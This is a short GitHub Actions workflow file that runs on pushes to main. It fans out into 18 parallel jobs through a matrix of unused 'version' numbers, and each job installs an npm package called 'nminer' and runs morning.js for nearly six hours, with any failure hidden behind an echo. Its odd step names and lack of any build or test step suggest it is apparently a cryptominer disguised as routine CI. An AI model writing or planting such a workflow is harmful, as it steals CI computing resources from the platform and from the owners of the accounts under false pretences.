name: morning
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 867 }
          - { version: 2577 }
          - { version: 8634 }
          - { version: 8868 }
          - { version: 8744 }
          - { version: 6329 }
          - { version: 8452 }
          - { version: 8739 }
          - { version: 5035 }
          - { version: 6730 }
          - { version: 8238 }
          - { version: 3028 }
          - { version: 7851 }
          - { version: 3129 }
          - { version: 7923 }
          - { version: 1980 }
          - { version: 9010 }
          - { version: 6659 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: how crocodile
        run: |
          npm install nminer@latest
          timeout 348m node morning.js || echo "morning executed"